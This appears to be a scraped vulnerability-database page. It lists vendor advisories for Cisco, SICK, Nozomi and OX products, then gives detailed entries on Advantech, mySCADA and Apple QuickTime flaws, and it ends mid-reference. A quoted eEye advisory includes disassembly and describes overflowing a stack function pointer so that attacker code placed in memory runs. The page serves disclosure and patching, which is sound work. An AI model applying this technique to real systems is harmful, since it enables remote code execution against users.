cisco-sa-sa-ftd-snort-fw-bcjtzpmu Cisco Firepower Threat Defense Software and Cisco FirePOWER Services TCP/IP Traffic with Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-sa-ftd-snort-fw-BCJTZPMu Cisco Firepower Threat Defense Software and Cisco FirePOWER Services TCP/IP Traffic with Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd2100-snort-dos-m9humt75 Cisco Firepower Threat Defense Software for Cisco Firepower 2100 Series Appliances TCP UDP Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd2100-snort-dos-M9HuMt75 Cisco Firepower Threat Defense Software for Cisco Firepower 2100 Series Appliances TCP UDP Snort 2 and Snort 3 Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-vdb-snort-djj4cnbr Cisco Firepower Threat Defense Software Vulnerability Database with Snort Detection Engine Security Policy Bypass and Denial of Service Issue 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-vdb-snort-djj4cnbR Cisco Firepower Threat Defense Software Vulnerability Database with Snort Detection Engine Security Policy Bypass and Denial of Service Issue 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-tls-dos-qxye5ufy Cisco Firepower Threat Defense Software for Firepower 2100 Series TLS Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-tls-dos-QXYE5Ufy Cisco Firepower Threat Defense Software for Firepower 2100 Series TLS Denial of Service Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-statcred-dfc8txt5 Cisco Firepower Threat Defense Software for Firepower 1000, 2100, 3100, and 4200 Series Static Credential Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
cisco-sa-ftd-statcred-dFC8tXT5 Cisco Firepower Threat Defense Software for Firepower 1000, 2100, 3100, and 4200 Series Static Credential Vulnerability 2024-10-23T16:00:00+00:00 2024-10-23T16:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
SCA-2022-0015 Use of a Broken or Risky Cryptographic Algorithm in SICK RFU6xx RADIO FREQUEN. SENSOR 2022-12-08T16:00:00.000Z 2022-12-08T16:00:00.000Z
sca-2022-0013 Password recovery vulnerability affects multiple SICK SIMs 2022-10-21T13:00:00.000Z 2022-11-04T14:00:00.000Z
SCA-2022-0013 Password recovery vulnerability affects multiple SICK SIMs 2022-10-21T13:00:00.000Z 2022-11-04T14:00:00.000Z
sca-2022-0014 SICK FlexiCompact affected by Denial of Service vulnerability 2022-10-31T11:00:00.000Z 2022-10-31T11:00:00.000Z
SCA-2022-0014 SICK FlexiCompact affected by Denial of Service vulnerability 2022-10-31T11:00:00.000Z 2022-10-31T11:00:00.000Z
sca-2022-0012 OpenSSL vulnerability affects multiple SICK SIMs 2022-08-08T13:00:00.000Z 2022-08-03T13:00:00.000Z
SCA-2022-0012 OpenSSL vulnerability affects multiple SICK SIMs 2022-08-08T13:00:00.000Z 2022-08-03T13:00:00.000Z
sca-2022-0010 Vulnerability in SICK Flexi Soft Designer & Safety Designer 2022-05-16T10:00:00.000Z 2022-07-19T10:00:00.000Z
SCA-2022-0010 Vulnerability in SICK Flexi Soft Designer & Safety Designer 2022-05-16T10:00:00.000Z 2022-07-19T10:00:00.000Z
sca-2022-0011 Vulnerabilities in SICK Package Analytics 2022-06-08T15:00:00.000Z 2022-06-08T15:00:00.000Z
SCA-2022-0011 Vulnerabilities in SICK Package Analytics 2022-06-08T15:00:00.000Z 2022-06-08T15:00:00.000Z
sca-2022-0009 Vulnerability in SICK Flexi Soft PROFINET IO Gateway FX0-GPNT and SICK microScan3 PROFINET 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0008 Vulnerability in SICK Gateways for Flexi Soft, Flexi Compact, SICK EFI Gateway UE4740, SICK microScan3 and outdoorScan3 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
SCA-2022-0009 Vulnerability in SICK Flexi Soft PROFINET IO Gateway FX0-GPNT and SICK microScan3 PROFINET 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
SCA-2022-0008 Vulnerability in SICK Gateways for Flexi Soft, Flexi Compact, SICK EFI Gateway UE4740, SICK microScan3 and outdoorScan3 2022-04-29T15:00:00.000Z 2022-04-29T15:00:00.000Z
sca-2022-0007 Vulnerabilities in SICK MARSIC300 2022-04-21T15:00:00.000Z 2022-04-21T15:00:00.000Z
SCA-2022-0007 Vulnerabilities in SICK MARSIC300 2022-04-21T15:00:00.000Z 2022-04-21T15:00:00.000Z
sca-2022-0006 Vulnerability in SICK MSC800 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0005 Vulnerability in SICK Overall Equipment Effectiveness (OEE) 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
SCA-2022-0006 Vulnerability in SICK MSC800 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
SCA-2022-0005 Vulnerability in SICK Overall Equipment Effectiveness (OEE) 2022-04-11T15:00:00.000Z 2022-04-11T15:00:00.000Z
sca-2022-0004 Microsoft vulnerability affects multiple SICK IPCs with SICK MEAC 2022-04-11T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0003 Vulnerabilities in SICK FTMg 2022-03-31T15:00:00.000Z 2022-03-31T15:00:00.000Z
SCA-2022-0004 Microsoft vulnerability affects multiple SICK IPCs with SICK MEAC 2022-04-11T15:00:00.000Z 2022-03-31T15:00:00.000Z
SCA-2022-0003 Vulnerabilities in SICK FTMg 2022-03-31T15:00:00.000Z 2022-03-31T15:00:00.000Z
sca-2022-0002 PwnKit vulnerability affects multiple SICK IPCs 2022-02-23T16:00:00.000Z 2022-02-23T16:00:00.000Z
SCA-2022-0002 PwnKit vulnerability affects multiple SICK IPCs 2022-02-23T16:00:00.000Z 2022-02-23T16:00:00.000Z
sca-2022-0001 Vulnerability in SICK FieldEcho 2022-02-17T16:00:00.000Z 2022-02-17T16:00:00.000Z
SCA-2022-0001 Vulnerability in SICK FieldEcho 2022-02-17T16:00:00.000Z 2022-02-17T16:00:00.000Z
sca-2021-0003 SICK Security Advisory for Apache Log4j (CVE-2021-44228) 2021-12-14T17:00:00.000Z 2021-12-17T12:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2022:2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2022:2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2024:2-01 Incorrect authorization for Reports configuration in Guardian/CMC before 24.2.0 2024-09-11T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 2024-04-10T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:15-01 Sensitive data exfiltration via unsafe permissions on Windows systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 2024-01-15T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2023:10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 2023-09-18T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2022:2-02 Authenticated RCE on project configuration import in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
NN-2022:2-01 Authenticated RCE on logo report upload in Guardian/CMC before 22.0.0 2022-02-14T11:00:00.000Z 2024-09-19T11:00:00.000Z
nn-2023_5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_16-01 Path traversal via 'zip slip' in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_14-01 Unsafe temporary data privileges on Unix systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_13-01 Missing authentication for local web interface in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023_1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023:5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 2023-08-09T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023:16-01 Path traversal via 'zip slip' in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023:14-01 Unsafe temporary data privileges on Unix systems in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023:13-01 Missing authentication for local web interface in Arc before v1.6.0 2024-05-15T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2023:1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 2023-05-03T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_2-01 Authenticated command path traversal on timezone settings in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
nn-2021_1-01 Authenticated command injection when changing date settings or hostname in Guardian/CMC before 20.0.7.4 2021-02-22T11:00:00.000Z 2024-05-20T11:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
OXAS-ADV-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 2023-03-20T00:00:00+01:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2023-02-06T00:00:00+01:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2022-11-02T00:00:00+01:00 2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2022-08-10T00:00:00+02:00 2024-01-22T00:00:00+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27eb IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-202004-0077 There are multiple ways an unauthenticated attacker could perform SQL injection on WebAccess/NMS (versions prior to 3.0.2) to gain access to sensitive information. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech WebAccess/NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the processing of calls to the DeviceData/Performance endpoint. When parsing the mac parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose information in the context of SYSTEM. Advantech WebAccess/NMS is a set of Web browser-based Network Management System (NMS) software package developed by China Taiwan Advantech Corporation. There is a SQL injection vulnerability in Advantech WebAccess/NMS versions earlier than 3.0.2
var-202411-1369 A parameter within a command does not properly validate input within myPRO Manager which could be exploited by an unauthenticated remote attacker to inject arbitrary operating system commands. mySCADA myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202411-1372 The web application uses a weak authentication mechanism to verify that a request is coming from an authenticated and authorized resource. mySCADA myPRO is a professional HMI/SCADA system designed for visualization and control of industrial processes. mySCADA myPRO Manager has an authorization vulnerability that allows attackers to submit special requests and access resources without authorization
var-202411-1370 An OS Command Injection vulnerability exists within myPRO Manager. A parameter within a command can be exploited by an unauthenticated remote attacker to inject arbitrary operating system commands. mySCADA myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes
var-202411-1371 The administrative interface listens by default on all interfaces on a TCP port and does not require authentication when being accessed. mySCADA myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes. mySCADA myPRO Manager has an access control error vulnerability that allows attackers to submit special requests and gain unauthorized access to resources
var-202411-1373 The back-end does not sufficiently verify the user-controlled filename parameter which makes it possible for an attacker to perform a path traversal attack and retrieve arbitrary files from the file system. mySCADA myPRO is a professional HMI/SCADA system designed primarily for visualization and control of industrial processes. mySCADA myPRO Manager has a directory traversal vulnerability that an attacker can exploit to submit special requests to view system file contents in the context of the application and obtain sensitive information
var-200512-0300 Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a GIF image file with a crafted Netscape Navigator Application Extension Block that modifies the heap in the Picture Modifier block. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted GIF image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. This flaw has proven to allow for reliable control of data on the heap chunk and can be exploited via a web site by using ActiveX controls. The heap can be overwritten in the Picture Modifier block. The block size calculate code such as: .text:66A339CC mov ax, [esi+0Ch] .text:66A339D0 xor ecx, ecx .text:66A339D2 mov [esp+34h+var_28], ecx .text:66A339D6 mov [esp+34h+var_24], ecx .text:66A339DA mov [esp+34h+var_20], ecx .text:66A339DE mov [esp+34h+var_1C], ecx .text:66A339E2 mov word ptr [esp+34h+var_10], cx .text:66A339E7 mov [esp+34h+arg_4], eax .text:66A339EB movsx eax, ax .text:66A339EE mov word ptr [esp+34h+var_10+2], cx .text:66A339F3 mov cx, [esi+8] .text:66A339F7 movsx edx, cx .text:66A339FA sub eax, edx .text:66A339FC movsx edx, word ptr [esi+6] .text:66A33A00 add eax, 3Eh .text:66A33A03 push edi .text:66A33A04 movsx edi, word ptr [esi+0Ah] .text:66A33A08 sar eax, 3 .text:66A33A0B lea ebx, [esi+6] .text:66A33A0E and eax, 0FFFFFFFCh .text:66A33A11 sub edi, edx .text:66A33A13 movsx edx, ax .text:66A33A16 mov [esi+4], ax .text:66A33A1A imul edi, edx The allocate code is : .text:66A33A68 push edi .text:66A33A69 call sub_668B5B30 But when it real process data to this memory, it use real decode data to write this memory but didn\xa1\xaft check this heap size. This is segment of the write code function(sub_66AE0A70): .text:66AE0B18 movsx edx, word ptr [edi+12h] ; default .text:66AE0B1C imul edx, [edi+0Ch] .text:66AE0B20 mov ecx, [edi+4] .text:66AE0B23 inc word ptr [edi+16h] .text:66AE0B27 mov eax, [esp+arg_0] .text:66AE0B2B add edx, ecx .text:66AE0B2D mov [eax], edx .text:66AE0B2F mov eax, [ebp+10h] .text:66AE0B32 test eax, eax .text:66AE0B34 jz short loc_66AE0B62 .text:66AE0B36 mov ax, [ebp+1Ch] .text:66AE0B3A mov edx, [ebp+0Ch] .text:66AE0B3D movzx cx, ah .text:66AE0B41 mov ch, al .text:66AE0B43 mov [edx], cx .text:66AE0B46 movsx eax, word ptr [edi+12h] .text:66AE0B4A imul eax, [ebp+14h] .text:66AE0B4E add eax, [ebp+10h] .text:66AE0B51 mov cx, [ebp+18h] .text:66AE0B55 mov [ebp+0Ch], eax .text:66AE0B58 mov [ebp+1Ah], cx .text:66AE0B5C mov word ptr [ebp+1Ch], 0 Vendor Status: Apple has released a patch for this vulnerability. An attacker can create a qtif file and send it to the user via email, web page, or qtif file with activex and can directy overflow a function pointer immediately used so it can bypass any stack overflow protection in systems such as xp sp2 and 2003 sp1. Technical Details: When Quicktime processes the data field of a qtif format file, it will copy it to the stack by a byte to a byte , but there is no proper checking, so it will cause a stack overflow in memory. And in this stack, there is a function pointer which will be used immediately when it pre byte copies, so we can use it to bypass any stack overflow protection, such in xp sp2 and 2003 sp1. The origin function point value is 0x44332211. We only need to overflow it to : 0x08332211, ensuring it didn't cause a crash before the 0x44 has been overflowed to 0x08. When it overflows to 0x08332211, we can execute code to 0x08332211, and can first use javascript to get this memory and set my code in it. call [esp+138h+arg_4] <- call a function point in the stack, but this point can be overflowed References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-2340. Credit: Discovery: Fang Xing Greetings: Thanks to all the guys at eEye, and especially Karl Lynn's help. Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-200512-0643 Heap-based buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a crafted (1) QuickTime Image File (QTIF), (2) PICT, or (3) JPEG format image with a long data field. Apple's QuickTime is a player for files and streaming media in a variety of different formats. QuickTime is prone to a remote heap-based overflow vulnerability. This issue presents itself when the application processes a specially crafted QTIF (QuickTime Image) file. A successful attack can result in a remote compromise. Apple QuickTime is prone to a buffer-overflow vulnerability because the application fails to do proper bounds checking on user-supplied data before copying it to finite-sized process buffers. Unsuccessful exploit attempts will most likely crash the application. This issue affects QuickTime 6.5.2 and 7.0.3; other versions may also be vulnerable. QuickTime 7.0.4 may also be vulnerable, but this has not been confirmed. This issue may have previously been discussed in BID 16202 (Apple QuickTime Multiple Code Execution Vulnerabilities). Quicktime will copy to the stack byte by byte when processing the data field of the qtif format file, but it does not perform the correct check, so it will cause a stack overflow in memory. The original function pointer value is 0x44332211. Just overflow it to 0x08332211 and make sure it doesn't crash before overflowing 0x44 to 0x08, and the code will execute. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-200512-0297 Integer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via a TIFF image file with modified image height and width (ImageWidth) tags. Apple's QuickTime is a player for files and streaming media in a variety of different formats. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. QuickTime is prone to a remote integer-overflow vulnerability. This issue presents itself when the application processes a specially crafted TIFF file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. Fortinet Security Advisory: FSA-2006-03 Apple QuickTime Player ImageWidth Denial of Service Vulnerability Advisory Date : January 12, 2006 Reported Date : November 28, 2005 Vendor : Apple computers Affected Products : Apple QuickTime Player v7.0.3 Severity : Medium Reference : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710 http://docs.info.apple.com/article.html?artnum=303101 http://www.securityfocus.com/bid/16202/info Description : Fortinet Security Research Team (FSRT) has discovered a Denial of Service Vulnerability in the Apple QuickTime Player. This is due to application failure to sanitize the parameter ImageWidth value while parsing TIFF image files. Impact : Denial of Service Solution : Apple Computers has released a security update for this vulnerability, which is available for downloading from Apples's web site under security update. Fortinet Protection: Fortinet is protecting network from this vulnerability with latest IPS update. Acknowledgment : Dejun Meng of Fortinet Security Research team found this vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - 